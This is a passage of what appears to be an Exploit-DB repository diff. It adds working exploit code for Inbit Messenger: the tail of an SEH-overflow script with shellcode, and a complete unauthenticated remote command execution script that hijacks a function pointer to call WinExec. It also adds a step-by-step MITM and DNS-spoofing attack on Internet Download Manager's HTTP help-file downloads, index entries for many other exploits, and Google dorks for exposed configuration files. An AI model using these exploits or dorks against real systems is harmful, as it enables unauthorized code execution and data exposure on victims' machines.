 NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89"
 NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00"
 def exploit(targetIp:str, targetPort:int) -> None:
  pkt  = b"<"
  pkt += (b"A" * 40)
  pkt += nSEH
  pkt += SEH
  pkt += NULL_ACT_CTX_STUB
  pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder
  pkt += SHELLCODE
  # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack
  pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt)))
  # NOTE: check for bad bytes
  for c in pkt:
    if c in BAD_BYTES:
      logging.error(f"found bad byte 0x{c:02x} in payload")
      sys.exit(-1)
  logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...")
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((targetIp, targetPort))
  s.send(pkt)
  s.close()
  logging.success("DONE")
 if __name__ == '__main__':
  # parse arguments
  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
  parser.add_argument('-t', '--target', help='target IP',   type=str, required=True)
  parser.add_argument('-p', '--port',   help='target port', type=int, required=False, default=10883)
  args = parser.parse_args()
  # define logger
  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
  logging.SUCCESS = logging.CRITICAL + 1
  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
  # print banner
  print(BANNER)
  # run exploit
  exploit(args.target, args.port)
--- a/exploits/windows/remote/51127.py
+++ b/exploits/windows/remote/51127.py
@ -0,0 +1,121 @@
 # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)
 # Date: 11/08/2022
 # Exploit Author: a-rey
 # Vendor Homepage: http://www.inbit.com/support.html
 # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
 # Version: v4.6.0 - v4.9.0
 # Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019
 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 import sys, socket, struct, string, argparse, logging
 BANNER = """\033[0m\033[1;35m
 ╔══════════════════════════════════════════════════════════════════════════╗
 ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║
 ╚══════════════════════════════════════════════════════════════════════════╝\033[0m
 by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗
     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║
     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝
     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝
     \033[1;36m██║  ██║     ██║  ██║███████╗   ██║
     \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝
 \033[0m"""
 # NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number
 TARGETS = {
  4601 : 0x005f3360,
  4801 : 0x005f7364,
  4901 : 0x005f7364,
 }
 # NOTE: min and max values for length of command
 CMD_MIN_LEN = 10
 CMD_MAX_LEN = 0xfc64
 # NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow
 BAD_BYTES = b"\x3e" # >
 def getWinExecAddress(targetIp:str, targetPort:int) -> bytes:
  # NOTE: send packet with client build number of 4601 for v4.6.0
  pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00"
  logging.info(f"trying to get version information from {targetIp}:{targetPort} ...")
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((targetIp, targetPort))
  s.send(pkt)
  _d = s.recv(1024)
  # find build tag in response
  if b'<c>' not in _d:
    logging.error(f"invalid version packet received: {_d}")
    sys.exit(-1)
  s.close()
  try:
    build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])
  except:
    logging.error(f"failed to parse build number from packet: {_d}")
    sys.exit(-1)
  # get the IAT offset
  if build not in TARGETS.keys():
    logging.error(f"unexpected build number: {build}")
    sys.exit(-1)
  # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]'
  winexec = struct.pack("<I", TARGETS[build] - 0x38)
  logging.success(f"target build number is {build}")
  logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}")
  # sanity check for bad bytes in WinExec address
  for c in winexec:
    if c in BAD_BYTES:
      logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}")
      sys.exit(-1)
  return winexec
 def exploit(targetIp:str, targetPort:int, command:bytes) -> None:
  # NOTE: command must be NULL terminated
  command += b"\x00"
  # check user command length
  if len(command) < CMD_MIN_LEN:
    logging.error(f"command length must be at least {CMD_MIN_LEN} characters")
    sys.exit(-1)
  if len(command) >= CMD_MAX_LEN:
    logging.error(f"command length must be less than {CMD_MAX_LEN} characters")
    sys.exit(-1)
  # get WinExec address
  winexec = getWinExecAddress(targetIp, targetPort)
  # get a string representation of the length of the command data after the <> tag parsed by atol()
  pktLen = str(len(command))
  pkt  = b"<"            # start of XML tag/stack overflow
  pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character
  pkt += b"\x00"         # NULL terminator to force atol to ignore what comes next
  # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol()
  pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite
  pkt += winexec                           # indirect function pointer we control
  pkt += b">"                              # end of XML tag/stack overflow
  pkt += command                           # the command set to the call to WinExec()
  logging.info(f"sending payload to {targetIp}:{targetPort} ...")
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((targetIp, targetPort))
  s.send(pkt)
  s.close()
  logging.success("DONE")
 if __name__ == '__main__':
  # parse arguments
  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
  parser.add_argument('-t', '--target',  help='target IP',      type=str, required=True)
  parser.add_argument('-c', '--command', help='command to run', type=str, required=True)
  parser.add_argument('-p', '--port',    help='target port',    type=int, required=False, default=10883)
  args = parser.parse_args()
  # define logger
  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
  logging.SUCCESS = logging.CRITICAL + 1
  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
  # print banner
  print(BANNER)
  # run exploit
  exploit(args.target, args.port, args.command.encode())
--- a/exploits/windows/remote/51131.txt
+++ b/exploits/windows/remote/51131.txt
@ -0,0 +1,43 @@
 # Exploit Title: Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
 # Date: 15.11.2022
 # Exploit Author: M. Akil Gündoğan
 # Contact: https://twitter.com/akilgundogan
 # Vendor Homepage: https://www.internetdownloadmanager.com/
 # Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe
 # Version: v.6.41 Build 3
 # Tested on: Windows 10 Professional x64
 # PoC Video: https://youtu.be/0djlanUbfY4
 Vulnerabiliy Description:
 ---------------------------------------
 Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension
 ".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is
 done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and
 replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading.
 This allows the attacker to execute code remotely.
 It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system.
 Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm".
 Requirements:
 ---------------------------------------
 The attacker and the victim must be on the same local network.
 The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges!
 Step by step produce:
 ---------------------------------------
 1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that.
 2 - A MITM attack is made against the target using Ettercap or Bettercap.
 3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing.
 4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the
    same name (tut_tr.chm / the file according to which language you are using.) is placed in it.
 5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished.
 Advisories:
 ---------------------------------------
 Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file
 should not be run automatically, additional warning messages should be displayed for users.
 Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends.
 ---------------------------------------
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3518,6 +3518,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,remote,hardware,,2011-06-21,2011-07-24,1,OSVDB-73430;CVE-2011-4716,,,,,
 18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",remote,hardware,,2011-11-04,2016-12-05,0,CVE-2011-4716;OSVDB-73430,,,,,
 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,,2020-03-13,2020-03-13,0,,,,,,
 51129,exploits/hardware/remote/51129.txt,"DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure",2023-03-29,"Aryan Chehreghani",remote,hardware,,2023-03-29,2023-03-29,0,,,,,,
 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,,2018-08-29,2018-08-29,0,,,,,,
 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,,2020-01-08,2020-01-08,0,CVE-2017-3623,,,,,
 28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,remote,hardware,,2006-10-31,2013-10-12,1,CVE-2006-5711;OSVDB-30193,,,,,https://www.securityfocus.com/bid/20834/info
@ -4830,6 +4831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,,2020-03-24,2020-03-24,0,CVE-2020-5722,,,,,
 29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,webapps,hardware,,2013-11-06,2013-11-06,0,OSVDB-99224,,,,,
 42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,webapps,hardware,,2017-06-11,2017-10-03,0,,,,,,
 51130,exploits/hardware/webapps/51130.txt,"Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)",2023-03-29,"Bleron Rrustemi",webapps,hardware,,2023-03-29,2023-03-29,0,,,,,,
 30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",webapps,hardware,,2013-12-16,2017-11-15,0,CVE-2013-7136;OSVDB-101192,,,,,http://www.planitcomputing.ie/upc-wifi-attack.pdf
 24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,webapps,hardware,,2013-02-18,2013-02-18,0,OSVDB-90332;OSVDB-90331,,,,,https://www.vulnerability-lab.com/get_content.php?id=873
 42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",webapps,hardware,,2017-09-18,2017-09-18,0,CVE-2017-14243,,,,,
@ -14801,6 +14803,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php,,2011-08-22,2011-08-22,1,,,,,,
 5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,webapps,php,,2008-06-01,2016-12-07,1,OSVDB-46333;CVE-2008-2645;OSVDB-46332;OSVDB-46331;OSVDB-46330;OSVDB-46329;OSVDB-46328;OSVDB-46327;OSVDB-46326,,,,http://www.exploit-db.combooby-1.0.1-12_May_2005.tar.gz,
 12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,webapps,php,,2010-05-25,,1,,,,,,
 51123,exploits/php/webapps/51123.txt,"Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)",2023-03-29,"Rajeshwar Singh",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80,2019-03-04,2019-03-06,0,CVE-2019-9581,"Metasploit Framework (MSF)",,,http://www.exploit-db.combooked-2.7.5.zip,
 50594,exploits/php/webapps/50594.py,"Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)",2021-12-14,0sunday,webapps,php,,2021-12-14,2021-12-14,0,CVE-2019-9581,,,,,
 48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,,2020-05-06,2020-05-06,0,,,,,,
@ -19136,6 +19139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",webapps,php,,2010-09-06,2014-09-10,1,,,,,,https://www.securityfocus.com/bid/43006/info
 30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",webapps,php,,2007-11-02,2014-01-06,1,CVE-2007-5952;OSVDB-38408,,,,,https://www.securityfocus.com/bid/26312/info
 30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",webapps,php,,2007-07-12,2013-12-15,1,CVE-2007-3693;OSVDB-36872,,,,,https://www.securityfocus.com/bid/24880/info
 51132,exploits/php/webapps/51132.txt,"Helmet Store Showroom v1.0 - SQL Injection",2023-03-29,"Ameer Hamza",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",webapps,php,,2005-11-14,2013-07-01,1,CVE-2005-3639;OSVDB-20861,,,,,https://www.securityfocus.com/bid/15404/info
 12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,webapps,php,,2010-04-26,,1,OSVDB-64103;CVE-2010-1652,,,,,
 28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,webapps,php,,2006-07-31,2013-09-16,1,OSVDB-28285,,,,,https://www.securityfocus.com/bid/19256/info
@ -19347,6 +19351,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System  0.1  - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
 51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
 35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
@ -28370,6 +28375,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17641,,,,,
 49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,,2021-01-05,2021-10-28,0,,,,,,
 49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",2021-01-06,"Arnav Tripathy",webapps,php,,2021-01-06,2021-10-11,0,,,,,,
 51133,exploits/php/webapps/51133.py,"Revenue Collection System v1.0 - Remote Code Execution (RCE)",2023-03-29,"Joe Pollock",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60
 41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip,
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz,
@ -33442,6 +33448,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php,,2009-10-29,2014-08-27,1,,,,,,https://www.securityfocus.com/bid/42327/info
 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,,
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@ -40589,6 +40596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,local,windows,,2010-11-28,2010-11-28,1,,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-28-at-74353-am.png,http://www.exploit-db.comotsturntablesfreesetup.exe,
 11475,exploits/windows/local/11475.py,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,local,windows,,2010-02-15,,1,,,,,http://www.exploit-db.comotsturntablesfreesetup.exe,
 48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,,2020-05-04,2020-05-04,0,,,,,,
 51128,exploits/windows/local/51128.txt,"Outline V1.6.0 - Unquoted Service Path",2023-03-29,"Milad karimi",local,windows,,2023-03-29,2023-03-29,0,,,,,,
 21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info
 29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info
 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,,
@ -42650,6 +42658,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,remote,windows,,2007-12-17,,1,CVE-2007-6493;OSVDB-40239,,,,,
 30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,remote,windows,,2007-12-26,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27033/info
 37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,remote,windows,,2015-07-14,2015-07-14,0,OSVDB-124655;OSVDB-124654,,,,,
 51127,exploits/windows/remote/51127.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,,
 51126,exploits/windows/remote/51126.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,,
 8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows,,2009-03-23,,1,,,,,,
 3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows,,2007-05-07,,1,OSVDB-34331;CVE-2007-1683,,,,,
 28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,remote,windows,,2013-10-10,2013-10-10,0,OSVDB-98333,,,,,
@ -42677,6 +42687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,,2017-01-02,2017-01-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-165012.png,http://www.exploit-db.comidasetup.exe,
 37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",remote,windows,,2015-07-21,2015-07-21,0,CVE-2014-6332,,,,,
 32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,remote,windows,,2008-10-06,2014-03-24,1,CVE-2008-4508;OSVDB-49030,,,,,https://www.securityfocus.com/bid/31603/info
 51131,exploits/windows/remote/51131.txt,"Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)",2023-03-29,"M. Akil Gündoğan",remote,windows,,2023-03-29,2023-03-29,0,,,,,,
 19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",remote,windows,,2000-05-17,2012-07-18,1,CVE-2000-0350;OSVDB-312,,,,,https://www.securityfocus.com/bid/1216/info
 23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,remote,windows,,2004-03-26,2013-01-03,1,,,,,,https://www.securityfocus.com/bid/9913/info
 20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",remote,windows,,2001-06-18,2012-08-30,1,CVE-2001-0788;OSVDB-13973,,,,,https://www.securityfocus.com/bid/2881/info
--- a/ghdb.xml
+++ b/ghdb.xml
@ -33946,6 +33946,21 @@ ManhNho
  <date>2018-05-29</date>
  <author>ManhNho</author>
 </entry>
 <entry>
  <id>8129</id>
  <link>https://www.exploit-db.com/ghdb/8129</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>BroadBand Device Webserver</shortDescription>
  <textualDescription># Google Dork: BroadBand Device Webserver
 # Files Containing Juicy Info
 # Date:29/03/2023
 # Exploit Author: Shx</textualDescription>
  <query>BroadBand Device Webserver</query>
  <querystring>https://www.google.com/search?q=BroadBand Device Webserver</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Shx</author>
 </entry>
 <entry>
  <id>4740</id>
  <link>https://www.exploit-db.com/ghdb/4740</link>
@ -40414,6 +40429,21 @@ Information about user data is obtained
  <date>2021-11-12</date>
  <author>Reza Abasi</author>
 </entry>
 <entry>
  <id>8131</id>
  <link>https://www.exploit-db.com/ghdb/8131</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of &quot;application.yml&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of &quot;application.yml&quot;
 # Files Containing Juicy Info
 # Date:29/03/2023
 # Exploit Author: Suman Das</textualDescription>
  <query>intitle:&quot;index of &quot;application.yml&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;application.yml&quot;</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Suman Das</author>
 </entry>
 <entry>
  <id>7959</id>
  <link>https://www.exploit-db.com/ghdb/7959</link>
@ -40429,6 +40459,21 @@ Information about user data is obtained
  <date>2022-06-29</date>
  <author>Suman Das</author>
 </entry>
 <entry>
  <id>8128</id>
  <link>https://www.exploit-db.com/ghdb/8128</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of &quot;conf.json&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of &quot;conf.json&quot;
 # Files Containing Juicy Info
 # Date:29/03/2023
 # Exploit Author: Suman Das</textualDescription>
  <query>intitle:&quot;index of &quot;conf.json&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;conf.json&quot;</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Suman Das</author>
 </entry>
 <entry>
  <id>7947</id>
  <link>https://www.exploit-db.com/ghdb/7947</link>
@ -47725,6 +47770,21 @@ Author: Abhinav Porwal
  <date>2021-10-04</date>
  <author>Asif Mohammad Khan</author>
 </entry>
 <entry>
  <id>8130</id>
  <link>https://www.exploit-db.com/ghdb/8130</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:index of django/admin site:.*</shortDescription>
  <textualDescription># Google Dork: intitle:index of django/admin site:.*
 # Files Containing Juicy Info
 # Date:29/03/2023
 # Exploit Author: Md rofikul</textualDescription>
  <query>intitle:index of django/admin site:.*</query>
  <querystring>https://www.google.com/search?q=intitle:index of django/admin site:.*</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Md rofikul</author>
 </entry>
 <entry>
  <id>7827</id>
  <link>https://www.exploit-db.com/ghdb/7827</link>
@ -68039,6 +68099,21 @@ Author: Sibi Mathew George
  <date>2021-10-25</date>
  <author>César Hernández Obispo</author>
 </entry>
 <entry>
  <id>8125</id>
